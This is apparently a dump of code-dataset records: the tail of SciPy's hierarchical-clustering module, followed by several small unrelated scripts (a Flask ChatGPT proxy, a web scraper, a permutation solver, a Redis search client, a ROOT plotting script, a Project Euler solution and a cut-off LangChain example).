lvs, ivl,\n leaf_label_func, i, labels,\n show_leaf_counts)\n if contraction_marks is not None:\n _append_contraction_marks(Z, iv + 5.0, i, n, contraction_marks, xp)\n return (iv + 5.0, 10.0, 0.0, d)\n elif i < n:\n _append_singleton_leaf_node(Z, p, n, level, lvs, ivl,\n leaf_label_func, i, labels)\n return (iv + 5.0, 10.0, 0.0, 0.0)\n\n # Otherwise, only truncate if we have a leaf node.\n #\n # Only place leaves if they correspond to original observations.\n if i < n:\n _append_singleton_leaf_node(Z, p, n, level, lvs, ivl,\n leaf_label_func, i, labels)\n return (iv + 5.0, 10.0, 0.0, 0.0)\n\n # !!! Otherwise, we don't have a leaf node, so work on plotting a\n # non-leaf node.\n # Actual indices of a and b\n aa = int_floor(Z[i - n, 0], xp)\n ab = int_floor(Z[i - n, 1], xp)\n if aa >= n:\n # The number of singletons below cluster a\n na = Z[aa - n, 3]\n # The distance between a's two direct children.\n da = Z[aa - n, 2]\n else:\n na = 1\n da = 0.0\n if ab >= n:\n nb = Z[ab - n, 3]\n db = Z[ab - n, 2]\n else:\n nb = 1\n db = 0.0\n\n if count_sort == 'ascending' or count_sort is True:\n # If a has a count greater than b, it and its descendents should\n # be drawn to the right. 
Otherwise, to the left.\n if na > nb:\n # The cluster index to draw to the left (ua) will be ab\n # and the one to draw to the right (ub) will be aa\n ua = ab\n ub = aa\n else:\n ua = aa\n ub = ab\n elif count_sort == 'descending':\n # If a has a count less than or equal to b, it and its\n # descendents should be drawn to the left. Otherwise, to\n # the right.\n if na > nb:\n ua = aa\n ub = ab\n else:\n ua = ab\n ub = aa\n elif distance_sort == 'ascending' or distance_sort is True:\n # If a has a distance greater than b, it and its descendents should\n # be drawn to the right. Otherwise, to the left.\n if da > db:\n ua = ab\n ub = aa\n else:\n ua = aa\n ub = ab\n elif distance_sort == 'descending':\n # If a has a distance less than or equal to b, it and its\n # descendents should be drawn to the left. Otherwise, to\n # the right.\n if da > db:\n ua = aa\n ub = ab\n else:\n ua = ab\n ub = aa\n else:\n ua = aa\n ub = ab\n\n # Updated iv variable and the amount of space used.\n (uiva, uwa, uah, uamd) = \\\n _dendrogram_calculate_info(\n Z=Z, p=p,\n truncate_mode=truncate_mode,\n color_threshold=color_threshold,\n get_leaves=get_leaves,\n orientation=orientation,\n labels=labels,\n count_sort=count_sort,\n distance_sort=distance_sort,\n show_leaf_counts=show_leaf_counts,\n i=ua, iv=iv, ivl=ivl, n=n,\n icoord_list=icoord_list,\n dcoord_list=dcoord_list, lvs=lvs,\n current_color=current_color,\n color_list=color_list,\n currently_below_threshold=currently_below_threshold,\n leaf_label_func=leaf_label_func,\n level=level + 1, contraction_marks=contraction_marks,\n link_color_func=link_color_func,\n above_threshold_color=above_threshold_color)\n\n h = Z[i - n, 2]\n if h >= color_threshold or color_threshold <= 0:\n c = above_threshold_color\n\n if currently_below_threshold[0]:\n current_color[0] = (current_color[0] + 1) % len(_link_line_colors)\n currently_below_threshold[0] = False\n else:\n currently_below_threshold[0] = True\n c = _link_line_colors[current_color[0]]\n\n (uivb, uwb, ubh, ubmd) = \\\n _dendrogram_calculate_info(\n Z=Z, p=p,\n truncate_mode=truncate_mode,\n color_threshold=color_threshold,\n get_leaves=get_leaves,\n orientation=orientation,\n labels=labels,\n count_sort=count_sort,\n distance_sort=distance_sort,\n show_leaf_counts=show_leaf_counts,\n i=ub, iv=iv + uwa, ivl=ivl, n=n,\n icoord_list=icoord_list,\n dcoord_list=dcoord_list, lvs=lvs,\n current_color=current_color,\n color_list=color_list,\n currently_below_threshold=currently_below_threshold,\n leaf_label_func=leaf_label_func,\n level=level + 1, contraction_marks=contraction_marks,\n link_color_func=link_color_func,\n above_threshold_color=above_threshold_color)\n\n max_dist = max(uamd, ubmd, h)\n\n icoord_list.append([uiva, uiva, uivb, uivb])\n dcoord_list.append([uah, h, h, ubh])\n if link_color_func is not None:\n v = link_color_func(int(i))\n if not isinstance(v, str):\n raise TypeError(\"link_color_func must return a matplotlib \"\n \"color string!\")\n color_list.append(v)\n else:\n color_list.append(c)\n\n return (((uiva + uivb) / 2), uwa + uwb, h, max_dist)\n\n\ndef is_isomorphic(T1, T2):\n \"\"\"\n Determine if two different cluster assignments are equivalent.\n\n Parameters\n ----------\n T1 : array_like\n An assignment of singleton cluster ids to flat cluster ids.\n T2 : array_like\n An assignment of singleton cluster ids to flat cluster ids.\n\n Returns\n -------\n b : bool\n Whether the flat cluster assignments `T1` and `T2` are\n equivalent.\n\n See Also\n --------\n linkage : for a description of what a 
linkage matrix is.\n fcluster : for the creation of flat cluster assignments.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import fcluster, is_isomorphic\n >>> from scipy.cluster.hierarchy import single, complete\n >>> from scipy.spatial.distance import pdist\n\n Two flat cluster assignments can be isomorphic if they represent the same\n cluster assignment, with different labels.\n\n For example, we can use the `scipy.cluster.hierarchy.single`: method\n and flatten the output to four clusters:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = single(pdist(X))\n >>> T = fcluster(Z, 1, criterion='distance')\n >>> T\n array([3, 3, 3, 4, 4, 4, 2, 2, 2, 1, 1, 1], dtype=int32)\n\n We can then do the same using the\n `scipy.cluster.hierarchy.complete`: method:\n\n >>> Z = complete(pdist(X))\n >>> T_ = fcluster(Z, 1.5, criterion='distance')\n >>> T_\n array([1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=int32)\n\n As we can see, in both cases we obtain four clusters and all the data\n points are distributed in the same way - the only thing that changes\n are the flat cluster labels (3 => 1, 4 =>2, 2 =>3 and 4 =>1), so both\n cluster assignments are isomorphic:\n\n >>> is_isomorphic(T, T_)\n True\n\n \"\"\"\n T1 = np.asarray(T1, order='c')\n T2 = np.asarray(T2, order='c')\n\n T1S = T1.shape\n T2S = T2.shape\n\n if len(T1S) != 1:\n raise ValueError('T1 must be one-dimensional.')\n if len(T2S) != 1:\n raise ValueError('T2 must be one-dimensional.')\n if T1S[0] != T2S[0]:\n raise ValueError('T1 and T2 must have the same number of elements.')\n n = T1S[0]\n d1 = {}\n d2 = {}\n for i in range(0, n):\n if T1[i] in d1:\n if T2[i] not in d2:\n return False\n if d1[T1[i]] != T2[i] or d2[T2[i]] != T1[i]:\n return False\n elif T2[i] in d2:\n return False\n else:\n d1[T1[i]] = T2[i]\n d2[T2[i]] = T1[i]\n return True\n\n\ndef maxdists(Z):\n \"\"\"\n Return the maximum distance between any non-singleton cluster.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded as a matrix. See\n ``linkage`` for more information.\n\n Returns\n -------\n maxdists : ndarray\n A ``(n-1)`` sized numpy array of doubles; ``MD[i]`` represents\n the maximum distance between any cluster (including\n singletons) below and including the node with index i. More\n specifically, ``MD[i] = Z[Q(i)-n, 2].max()`` where ``Q(i)`` is the\n set of all node indices below and including node i.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n is_monotonic : for testing for monotonicity of a linkage matrix.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import median, maxdists\n >>> from scipy.spatial.distance import pdist\n\n Given a linkage matrix ``Z``, `scipy.cluster.hierarchy.maxdists`\n computes for each new cluster generated (i.e., for each row of the linkage\n matrix) what is the maximum distance between any two child clusters.\n\n Due to the nature of hierarchical clustering, in many cases this is going\n to be just the distance between the two child clusters that were merged\n to form the current one - that is, Z[:,2].\n\n However, for non-monotonic cluster assignments such as\n `scipy.cluster.hierarchy.median` clustering this is not always the\n case: There may be cluster formations were the distance between the two\n clusters merged is smaller than the distance between their children.\n\n We can see this in an example:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... 
[0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = median(pdist(X))\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 2. , 12. , 1.11803399, 3. ],\n [ 5. , 13. , 1.11803399, 3. ],\n [ 8. , 15. , 1.11803399, 3. ],\n [11. , 14. , 1.11803399, 3. ],\n [18. , 19. , 3. , 6. ],\n [16. , 17. , 3.5 , 6. ],\n [20. , 21. , 3.25 , 12. ]])\n >>> maxdists(Z)\n array([1. , 1. , 1. , 1. , 1.11803399,\n 1.11803399, 1.11803399, 1.11803399, 3. , 3.5 ,\n 3.5 ])\n\n Note that while the distance between the two clusters merged when creating the\n last cluster is 3.25, there are two children (clusters 16 and 17) whose distance\n is larger (3.5). Thus, `scipy.cluster.hierarchy.maxdists` returns 3.5 in\n this case.\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='C', dtype=xp.float64, xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n\n n = Z.shape[0] + 1\n MD = np.zeros((n - 1,))\n Z = np.asarray(Z)\n _hierarchy.get_max_dist_for_each_cluster(Z, MD, int(n))\n MD = xp.asarray(MD)\n return MD\n\n\ndef maxinconsts(Z, R):\n \"\"\"\n Return the maximum inconsistency coefficient for each\n non-singleton cluster and its children.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded as a matrix. See\n `linkage` for more information.\n R : ndarray\n The inconsistency matrix.\n\n Returns\n -------\n MI : ndarray\n A monotonic ``(n-1)``-sized numpy array of doubles.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n inconsistent : for the creation of a inconsistency matrix.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import median, inconsistent, maxinconsts\n >>> from scipy.spatial.distance import pdist\n\n Given a data set ``X``, we can apply a clustering method to obtain a\n linkage matrix ``Z``. `scipy.cluster.hierarchy.inconsistent` can\n be also used to obtain the inconsistency matrix ``R`` associated to\n this clustering process:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = median(pdist(X))\n >>> R = inconsistent(Z)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 2. , 12. , 1.11803399, 3. ],\n [ 5. , 13. , 1.11803399, 3. ],\n [ 8. , 15. , 1.11803399, 3. ],\n [11. , 14. , 1.11803399, 3. ],\n [18. , 19. , 3. , 6. ],\n [16. , 17. , 3.5 , 6. ],\n [20. , 21. , 3.25 , 12. ]])\n >>> R\n array([[1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.74535599, 1.08655358, 3. , 1.15470054],\n [1.91202266, 1.37522872, 3. , 1.15470054],\n [3.25 , 0.25 , 3. , 0. ]])\n\n Here, `scipy.cluster.hierarchy.maxinconsts` can be used to compute\n the maximum value of the inconsistency statistic (the last column of\n ``R``) for each non-singleton cluster and its children:\n\n >>> maxinconsts(Z, R)\n array([0. , 0. , 0. , 0. 
, 0.70710678,\n 0.70710678, 0.70710678, 0.70710678, 1.15470054, 1.15470054,\n 1.15470054])\n\n \"\"\"\n xp = array_namespace(Z, R)\n Z = as_xparray(Z, order='C', dtype=xp.float64, xp=xp)\n R = as_xparray(R, order='C', dtype=xp.float64, xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n is_valid_im(R, throw=True, name='R')\n\n n = Z.shape[0] + 1\n if Z.shape[0] != R.shape[0]:\n raise ValueError(\"The inconsistency matrix and linkage matrix each \"\n \"have a different number of rows.\")\n MI = np.zeros((n - 1,))\n Z = np.asarray(Z)\n R = np.asarray(R)\n _hierarchy.get_max_Rfield_for_each_cluster(Z, R, MI, int(n), 3)\n MI = xp.asarray(MI)\n return MI\n\n\ndef maxRstat(Z, R, i):\n \"\"\"\n Return the maximum statistic for each non-singleton cluster and its\n children.\n\n Parameters\n ----------\n Z : array_like\n The hierarchical clustering encoded as a matrix. See `linkage` for more\n information.\n R : array_like\n The inconsistency matrix.\n i : int\n The column of `R` to use as the statistic.\n\n Returns\n -------\n MR : ndarray\n Calculates the maximum statistic for the i'th column of the\n inconsistency matrix `R` for each non-singleton cluster\n node. ``MR[j]`` is the maximum over ``R[Q(j)-n, i]``, where\n ``Q(j)`` the set of all node ids corresponding to nodes below\n and including ``j``.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n inconsistent : for the creation of a inconsistency matrix.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import median, inconsistent, maxRstat\n >>> from scipy.spatial.distance import pdist\n\n Given a data set ``X``, we can apply a clustering method to obtain a\n linkage matrix ``Z``. `scipy.cluster.hierarchy.inconsistent` can\n be also used to obtain the inconsistency matrix ``R`` associated to\n this clustering process:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = median(pdist(X))\n >>> R = inconsistent(Z)\n >>> R\n array([[1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.74535599, 1.08655358, 3. , 1.15470054],\n [1.91202266, 1.37522872, 3. , 1.15470054],\n [3.25 , 0.25 , 3. , 0. ]])\n\n `scipy.cluster.hierarchy.maxRstat` can be used to compute\n the maximum value of each column of ``R``, for each non-singleton\n cluster and its children:\n\n >>> maxRstat(Z, R, 0)\n array([1. , 1. , 1. , 1. , 1.05901699,\n 1.05901699, 1.05901699, 1.05901699, 1.74535599, 1.91202266,\n 3.25 ])\n >>> maxRstat(Z, R, 1)\n array([0. , 0. , 0. , 0. , 0.08346263,\n 0.08346263, 0.08346263, 0.08346263, 1.08655358, 1.37522872,\n 1.37522872])\n >>> maxRstat(Z, R, 3)\n array([0. , 0. , 0. , 0. 
, 0.70710678,\n 0.70710678, 0.70710678, 0.70710678, 1.15470054, 1.15470054,\n 1.15470054])\n\n \"\"\"\n xp = array_namespace(Z, R)\n Z = as_xparray(Z, order='C', dtype=xp.float64, xp=xp)\n R = as_xparray(R, order='C', dtype=xp.float64, xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n is_valid_im(R, throw=True, name='R')\n\n if not isinstance(i, int):\n raise TypeError('The third argument must be an integer.')\n\n if i < 0 or i > 3:\n raise ValueError('i must be an integer between 0 and 3 inclusive.')\n\n if Z.shape[0] != R.shape[0]:\n raise ValueError(\"The inconsistency matrix and linkage matrix each \"\n \"have a different number of rows.\")\n\n n = Z.shape[0] + 1\n MR = np.zeros((n - 1,))\n Z = np.asarray(Z)\n R = np.asarray(R)\n _hierarchy.get_max_Rfield_for_each_cluster(Z, R, MR, int(n), i)\n MR = xp.asarray(MR)\n return MR\n\n\ndef leaders(Z, T):\n \"\"\"\n Return the root nodes in a hierarchical clustering.\n\n Returns the root nodes in a hierarchical clustering corresponding\n to a cut defined by a flat cluster assignment vector ``T``. See\n the ``fcluster`` function for more information on the format of ``T``.\n\n For each flat cluster :math:`j` of the :math:`k` flat clusters\n represented in the n-sized flat cluster assignment vector ``T``,\n this function finds the lowest cluster node :math:`i` in the linkage\n tree Z, such that:\n\n * leaf descendants belong only to flat cluster j\n (i.e., ``T[p]==j`` for all :math:`p` in :math:`S(i)`, where\n :math:`S(i)` is the set of leaf ids of descendant leaf nodes\n with cluster node :math:`i`)\n\n * there does not exist a leaf that is not a descendant with\n :math:`i` that also belongs to cluster :math:`j`\n (i.e., ``T[q]!=j`` for all :math:`q` not in :math:`S(i)`). If\n this condition is violated, ``T`` is not a valid cluster\n assignment vector, and an exception will be thrown.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded as a matrix. See\n `linkage` for more information.\n T : ndarray\n The flat cluster assignment vector.\n\n Returns\n -------\n L : ndarray\n The leader linkage node id's stored as a k-element 1-D array,\n where ``k`` is the number of flat clusters found in ``T``.\n\n ``L[j]=i`` is the linkage cluster node id that is the\n leader of flat cluster with id M[j]. If ``i < n``, ``i``\n corresponds to an original observation, otherwise it\n corresponds to a non-singleton cluster.\n M : ndarray\n The leader linkage node id's stored as a k-element 1-D array, where\n ``k`` is the number of flat clusters found in ``T``. This allows the\n set of flat cluster ids to be any arbitrary set of ``k`` integers.\n\n For example: if ``L[3]=2`` and ``M[3]=8``, the flat cluster with\n id 8's leader is linkage node 2.\n\n See Also\n --------\n fcluster : for the creation of flat cluster assignments.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, fcluster, leaders\n >>> from scipy.spatial.distance import pdist\n\n Given a linkage matrix ``Z`` - obtained after apply a clustering method\n to a dataset ``X`` - and a flat cluster assignment array ``T``:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. 
],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n\n >>> T = fcluster(Z, 3, criterion='distance')\n >>> T\n array([1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=int32)\n\n `scipy.cluster.hierarchy.leaders` returns the indices of the nodes\n in the dendrogram that are the leaders of each flat cluster:\n\n >>> L, M = leaders(Z, T)\n >>> L\n array([16, 17, 18, 19], dtype=int32)\n\n (remember that indices 0-11 point to the 12 data points in ``X``,\n whereas indices 12-22 point to the 11 rows of ``Z``)\n\n `scipy.cluster.hierarchy.leaders` also returns the indices of\n the flat clusters in ``T``:\n\n >>> M\n array([1, 2, 3, 4], dtype=int32)\n\n \"\"\"\n xp = array_namespace(Z, T)\n Z = as_xparray(Z, order='C', dtype=xp.float64)\n T = as_xparray(T, order='C')\n is_valid_linkage(Z, throw=True, name='Z')\n\n if T.dtype != xp.int32:\n raise TypeError('T must be a 1-D array of dtype int32.')\n\n if T.shape[0] != Z.shape[0] + 1:\n raise ValueError('Mismatch: len(T)!=Z.shape[0] + 1.')\n\n n_clusters = int(xp.unique_values(T).shape[0])\n n_obs = int(Z.shape[0] + 1)\n L = np.zeros(n_clusters, dtype=np.int32)\n M = np.zeros(n_clusters, dtype=np.int32)\n Z = np.asarray(Z)\n T = np.asarray(T, dtype=np.int32)\n s = _hierarchy.leaders(Z, T, L, M, n_clusters, n_obs)\n if s >= 0:\n raise ValueError(('T is not a valid assignment vector. Error found '\n 'when examining linkage node %d (< 2n-1).') % s)\n L, M = xp.asarray(L), xp.asarray(M)\n return (L, M)\n","repo_name":"scipy/scipy","sub_path":"scipy/cluster/hierarchy.py","file_name":"hierarchy.py","file_ext":"py","file_size_in_byte":145002,"program_lang":"python","lang":"en","doc_type":"code","stars":11925,"dataset":"github-code","pt":"57"} +{"seq_id":"16769087451","text":"#chat-gptの値をhtmlに受け渡す仕組み作る\n\nfrom flask import *\nimport requests\n\napp = Flask(__name__)\n\nvariable = \"Hello, World!\"\napp.secret_key = 'api_key'\n\n# チャットGPTに質問する関数\ndef query_chatgpt(prompt, apiKey):\n header = {\n \"Content-Type\" : \"application/json\",\n \"Authorization\" : f\"Bearer {apiKey}\",\n }\n\n body = '''\n {\n \"model\": \"gpt-3.5-turbo\",\n \"messages\": [\n {\"role\": \"user\", \"content\":\"''' + prompt + '''\"}\n ]\n }\n '''\n response = requests.post(\"https://api.openai.com/v1/chat/completions\", headers = header, data = body.encode('utf_8'))\n rj = response.json()\n return rj[\"choices\"][0][\"message\"][\"content\"]\n\n@app.route('/', methods=['GET'])\ndef index():\n return render_template('index.html', placeholder=\"OPENAIのAPIKEYを入れてください\", value=\"登録\")\n\n@app.route(\"/\", methods=[\"POST\"])\ndef api():\n session[\"apiKey\"] = request.form[\"apiKey\"]\n return render_template(\"index.html\",placeholder=session[\"apiKey\"],value=\"登録済\")\n\n@app.route('/get_variable', methods=[\"POST\"])\ndef get_variable():\n apiKey = session[\"apiKey\"]\n message = request.json.get('message')\n prompt = message\n ans = query_chatgpt(prompt, apiKey)\n return jsonify({'variable': ans})\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"konegi/frontend","sub_path":"gpt.py","file_name":"gpt.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"2253527340","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\n\ndef crawl(keyWord):\n input_list = []\n regex = re.compile(r'[\\r\\n\\t]')\n for i in range(1, 11):\n url = \"https://www.fonfood.com/s/\" + keyWord + \"/\" + str(i)\n response = requests.get(url)\n soup = 
BeautifulSoup(response.text , 'html.parser')\n articles = soup.findAll('div' , {'class':'storeListItem '})\n for article in articles:\n meta = article.find('a')\n address = article.find('p').get_text()\n address = regex.sub('', address)\n input_list.append((meta['title'], address))\n return input_list\n\nwhile True:\n\tinputStr = input()\n\tdata = crawl(inputStr)\n\tprint(data)\n\t#title = meta.get_text().strip()\n","repo_name":"oscarada87/coding365","sub_path":"telegramBot/pickLunch/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"10688224220","text":"from math import factorial\ndef backtrack(x, idx):\n global temp\n if idx == len(s):\n temp += 1\n if temp == n:\n return x\n else:\n for i in s:\n if i not in x:\n ret = backtrack(x + i, idx + 1)\n if ret:\n return ret\n return None\nwhile True:\n try:\n temp = 0\n s, n = input().split()\n n = int(n)\n if factorial(len(s)) < n:\n print(f'{s} {n} = No permutation')\n else:\n print(f'{s} {n} =', backtrack('', 0))\n except EOFError:\n break\n","repo_name":"jongpark1234/Baekjoon","sub_path":"09000/baekjoon_9742.py","file_name":"baekjoon_9742.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"71221654579","text":"import search_pb2 as pb2\r\nimport search_pb2_grpc as pb2_grpc\r\nimport grpc\r\nimport redis\r\nimport json\r\nfrom searchform import ProductSearchForm\r\nfrom flask import Flask, jsonify, flash, render_template, request, redirect\r\nimport sys\r\napp = Flask(__name__)\r\n\r\n\r\nclass SearchClient(object):\r\n \"\"\"\r\n Client for gRPC functionality\r\n \"\"\"\r\n\r\n def __init__(self):\r\n self.host = 'localhost'\r\n self.server_port = 50051\r\n\r\n # instantiate a channel\r\n self.channel = grpc.insecure_channel(\r\n '{}:{}'.format(self.host, self.server_port))\r\n\r\n # bind the client and the server\r\n self.stub = pb2_grpc.SearchStub(self.channel)\r\n\r\n def get_url(self, message):\r\n \"\"\"\r\n Client function to call the rpc for GetServerResponse\r\n \"\"\"\r\n message = pb2.Message(message=message)\r\n print(f'{message}')\r\n return self.stub.GetServerResponse(message)\r\n\r\n\r\nr = redis.Redis(host='localhost', port=6379, db=0)\r\n\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n search = ProductSearchForm(request.form)\r\n if request.method == 'POST':\r\n return getProduct(search)\r\n return render_template('index.html', form=search)\r\n\r\n\r\n@app.route('/results')\r\ndef getProduct(search):\r\n\r\n r = redis.Redis(host='localhost', port=6379, db=0)\r\n\r\n search_string = search.data['search']\r\n # print(search_string)\r\n search_results = search_string.lower()\r\n results = []\r\n\r\n value = r.get(f'results: {search_results}')\r\n if value:\r\n print(f'La búsqueda de {search_results} se encontró en cache.')\r\n result = value.decode()\r\n results = result.replace(\"[\", \"\")\r\n result = results.replace(\"]\", \"\")\r\n results = result.split(\"'{\")\r\n final = []\r\n for i in results:\r\n result = i.replace(\"}',\", \"\")\r\n final.append(result)\r\n return jsonify({'resultados': final})\r\n #result = jsonify({'resultados': result})\r\n # return result\r\n else:\r\n print(f'La búsqueda de {search_results} no se encontró en cache.')\r\n client = SearchClient()\r\n result = client.get_url(search_results)\r\n # print(len(result.product))\r\n if 
(len(result.product) > 0):\r\n for i in result.product:\r\n res = \"{\" + f'id: \"{str(i.id).strip()}\",' + f'brand_name: \"{str(i.brand_name).strip()}\",' + f'items_description: \"{str(i.items_description).strip()}\",' + \\\r\n f'prices: \"{str(i.prices).strip()}\",' + \\\r\n f'category: \"{str(i.category).strip()}\"' + \"}\"\r\n results.append(res)\r\n r.set(f'results: {search_results}', str(results))\r\n return jsonify({'resultados': results})\r\n\r\n return \"No se encontraron resultados.\"\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, port=50051)\r\n","repo_name":"Lineamingu/SisDis-022021","sub_path":"Tarea1/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"74251642098","text":"import sys\n\nimport common\n\nimport ROOT\n\nROOT.gStyle.SetLabelSize(0.05, 'X')\nROOT.gStyle.SetLabelSize(0.05, 'Y')\nROOT.gStyle.SetNumberContours(128)\nROOT.gStyle.SetPalette(ROOT.kTemperatureMap)\nROOT.gStyle.SetPaintTextFormat('.3f')\n\nsource = ROOT.TFile.Open(sys.argv[1])\nfitres = source.Get('fit_mdf')\npars = fitres.floatParsFinal()\n\nobs = sys.argv[2]\noutname = sys.argv[3]\n\nnpoi = len(common.binnames[obs])\n\nmatrix = ROOT.TH2D('correlation', '', npoi, 0., float(npoi), npoi, 0., float(npoi))\n\npois = []\nfor ip in range(npoi):\n poi = pars[pars.index('r_%d' % ip)]\n\n pois.append(poi)\n\n matrix.GetXaxis().SetBinLabel(ip + 1, '#mu_{%s}' % common.bintitles[obs][ip])\n matrix.GetYaxis().SetBinLabel(ip + 1, '#mu_{%s}' % common.bintitles[obs][ip])\n\nfor ip1 in range(npoi):\n for ip2 in range(npoi):\n matrix.SetBinContent(ip1 + 1, ip2 + 1, fitres.correlation(pois[ip1], pois[ip2]))\n\nmatrix.SetMaximum(1.)\nmatrix.SetMinimum(-1.)\nmatrix.SetMarkerSize(1.5)\n\ncanvas = ROOT.TCanvas('c1', 'c1', 600, 600)\ncanvas.SetLeftMargin(0.15)\ncanvas.SetBottomMargin(0.12)\ncanvas.SetTopMargin(0.08)\ncanvas.SetRightMargin(0.05)\nmatrix.Draw('COL TEXT')\n\ncmsLabel = common.makeCMS(prelim=True, out=True)\nlumiLabel = common.makeLumi(137.)\ncmsLabel.Draw()\nlumiLabel.Draw()\n\ncanvas.Print(outname)\n","repo_name":"latinos/PlotsConfigurations","sub_path":"Configurations/Differential/tools/plotting/plot_correlation_matrix.py","file_name":"plot_correlation_matrix.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"14650142174","text":"\"\"\"Number spiral diagonals\n\nStarting with the number 1 and moving to the right in a clockwise\ndirection a 5 by 5 spiral is formed as follows:\n\n 21 22 23 24 25\n 20 7 8 9 10\n 19 6 1 2 11\n 18 5 4 3 12\n 17 16 15 14 13\n\nIt can be verified that the sum of the numbers on the diagonals is 101.\n\nWhat is the sum of the numbers on the diagonals in a 1001 by 1001 spiral\nformed in the same way?\n\nAnswer: 669171001\n\"\"\"\n\n\ndef solve():\n UPPER_BOUND = 1002\n sumValue = 1\n for i in range(3, UPPER_BOUND, 2):\n value = i * i\n red = i - 1\n for _ in range(4):\n sumValue += value\n value -= red\n\n return sumValue\n\n\nif __name__ == '__main__':\n print(solve())\n","repo_name":"yhlam/project-euler","sub_path":"project_euler/p028.py","file_name":"p028.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"1599496877","text":"from langchain.llms import LlamaCpp\nfrom langchain.callbacks.manager import CallbackManager\nfrom 
langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler\nfrom langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.document_loaders import OnlinePDFLoader\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.vectorstores import Chroma\n\n\nn_gpu_layers = 1 # Metal set to 1 is enough.\nn_batch = 512 # Should be between 1 and n_ctx, consider the amount of RAM of your Apple Silicon Chip.\ncallback_manager = CallbackManager([StreamingStdOutCallbackHandler()])\n\n# Make sure the model path is correct for your system!\nllm = LlamaCpp(\n model_path=\"/Users/anyangpeng/Documents/DataScience/LLM/llama2ccp/llama-2-13b.ggmlv3.q5_0.bin\",\n n_gpu_layers=n_gpu_layers,\n n_batch=n_batch,\n n_ctx=2048,\n f16_kv=True, # MUST set to True, otherwise you will run into problem after a couple of calls\n callback_manager=callback_manager,\n verbose=False,\n)\n\n# Load the document, split it into chunks, embed each 